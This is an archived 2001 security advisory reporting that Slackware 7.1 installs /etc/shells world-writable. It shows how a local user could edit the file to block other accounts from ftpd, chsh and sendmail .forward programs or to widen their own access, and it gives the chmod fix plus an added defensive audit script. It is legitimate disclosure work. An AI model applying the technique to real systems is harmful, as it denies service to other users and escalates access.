Date: Mon, 11 Jun 2001 10:15:27 GMT
From: recidjvo <[email protected]>
To: [email protected]
Subject: [PkC] Advisory #005: Default Slackware 7.1 installation /etc/shells perms bug
/* pkc005.txt */
-=[ SECURITY ADVISORY #005 ]=-
[ Packet Knights Crew ]
- Vulnerable program: Linux Slackware 7.1 default installation
- Tested on: i386 from official iso image on ftp.slackware.com
- Advisory author: tHE rECIdjVO <[email protected]>
- Group: Packet Knights (http://www.pkcrew.org/)
- Date of release: 06/11/2001
- Problems: /etc/shells is installed with world-writable permissions.
- Impact: Non-privileged users can cause a denial of service against
other users or increase their own access.
- Risk level: MEDIUM-HIGH
- Exploit: Proof-of-concept script attached.
- Dedicated to: My little kitty that was killed. She really loved me.
- Credits: A bad sunday night and my sadness.
- Greetings: (you know if you're here... - and now I can smile.)
- Summary:
There is an error in the default installation of Linux
Slackware 7.1 (tested only on the i386 version).
When the files in /etc are installed, /etc/shells is created with
world-writable permissions (-rw-rw-rw-), allowing any non-privileged
user with login access to misconfigure the entire system.
- Details:
This may look like a minor bug, but its impact on system integrity
can be severe.
The main problem is that changing the contents of /etc/shells
changes the behaviour of the glibc call getusershell(3), which programs
commonly use to decide whether an account is valid by comparing the
shell field in /etc/passwd against the shells listed in /etc/shells.
This allows a denial of service against other users, or a gain of
privileges if the attacker is restricted by his login shell.
[recidjvo@pkcrew:~]$ ls -l /etc/shells | cut -f1 -d' '
-rw-rw-rw-
Some examples:
(in the following examples recidjvo has a valid shell in
/etc/shells, cyrax doesn't)
1. ftpd
One of the conditions that must be satisfied for a successful FTP
login is that the user must have a valid shell (anonymous FTP does
not perform this check).
This means that we can prevent any user (except the ftp user) from
logging into the FTP server (or let ourselves in if we couldn't before).
[recidjvo@pkcrew:~]$ ftp localhost
Connected to localhost.
220 FTP server (slackware.pkcrew.org) ready.
Name (localhost:recidjvo): cyrax
331 Password required for cyrax.
Password:
530 Login incorrect.
Login failed.
[recidjvo@pkcrew:~]$
(in syslogd output)
pkcrew ftpd[158]: connect from 127.0.0.1
pkcrew ftpd[158]: FTP LOGIN REFUSED (shell not in /etc/shells)
FROM localhost [127.0.0.1], cyrax
2. chsh
chsh(1) is a utility to change a user's default login shell.
If you're root, you can do anything you want, as usual; but if you're
an ordinary user, chsh only lets you change your login shell if
your current shell in /etc/passwd matches a shell listed in /etc/shells.
[cyrax@pkcrew:~]$ chsh
You may not change the shell for cyrax.
[cyrax@pkcrew:~]$
(in syslogd output)
pkcrew chsh[174]: can't change shell for `cyrax'
3. sendmail
This is not always a complete denial of service, but we can
block the execution of user-defined commands in ~/.forward files,
and learn something about how users handle their mail.
If a user has a program in his .forward, he will no longer receive mail.
Sendmail checks that the destination user has a valid login shell in
/etc/shells before allowing execution of commands in .forward,
as shown below.
[recidjvo@pkcrew:~]$ mail [email protected] -s '/etc/shells bug'
Have fun :)
t.R.
.
Cc:
/home/cyrax/.forward: line 1: | mailparser... User [email protected]
doesn't have a valid shell for mailing to programs
/home/recidjvo/dead.letter... Saved message in
/home/recidjvo/dead.letter
[recidjvo@pkcrew:~]$
4. Others
I found other programs whose behaviour can be altered by changing
/etc/shells (e.g. rpc.yppasswdd, gdmlogin, su built from the source tree).
Check any program that uses the getusershell(3) call to authorize
actions.
- Solution:
If you're root, chmod 644 /etc/shells will fix
the problem.
If you're an ordinary user and you're not in love with root, check
that your shell is always listed in /etc/shells :)
This bug seems to be fixed in the slackware-current branch.
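The check the Solution section describes, as an added audit script that is not part of the original advisory or its attached proof-of-concept: it reads the mode bits with the same ls|cut the advisory uses and cross-checks every login shell in a passwd file against a shells file the way ftpd, chsh and sendmail do. File paths are parameters so it can be run against copies; the function names are my own.

```shell
#!/bin/sh
# Added example (not part of the original advisory): audit a shells file
# and a passwd file for the two conditions the advisory relies on.
# Usage: sh audit_shells.sh /etc/shells /etc/passwd

# shells_file_writable_by_others FILE: returns 0 (true) when the group or
# other write bit is set, using the same ls|cut check the advisory shows.
shells_file_writable_by_others() {
    perms=$(ls -l "$1" | cut -f1 -d' ')
    case "$perms" in
        ?????w*|????????w*) return 0 ;;   # position 6 = group w, 9 = other w
        *) return 1 ;;
    esac
}

# unlisted_shells SHELLS_FILE PASSWD_FILE: prints "user shell" for every
# account whose login shell is not listed (exact line match, which is what
# a getusershell(3) comparison amounts to). An empty shell field is taken
# as /bin/sh, as login programs conventionally do.
unlisted_shells() {
    while IFS=: read -r user pw uid gid gecos home shell; do
        [ -z "$shell" ] && shell=/bin/sh
        if ! grep -qxF -- "$shell" "$1"; then
            printf '%s %s\n' "$user" "$shell"
        fi
    done < "$2"
    return 0
}

# audit_shells SHELLS_FILE PASSWD_FILE: returns 0 when clean, 1 on findings.
audit_shells() {
    rc=0
    if shells_file_writable_by_others "$1"; then
        echo "FINDING: $1 is group/world-writable; fix with: chmod 644 $1"
        rc=1
    fi
    findings=$(unlisted_shells "$1" "$2")
    if [ -n "$findings" ]; then
        printf 'FINDING: login shells not listed in %s (ftpd/chsh/.forward will refuse them):\n%s\n' "$1" "$findings"
        rc=1
    fi
    return $rc
}

# Run only when both paths are given explicitly, so sourcing is side-effect free.
if [ $# -ge 2 ]; then
    audit_shells "$1" "$2"
fi
```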
/* pkc005.txt */
[Attachment: ShellsTrunz.sh (base64-encoded shell script, omitted)]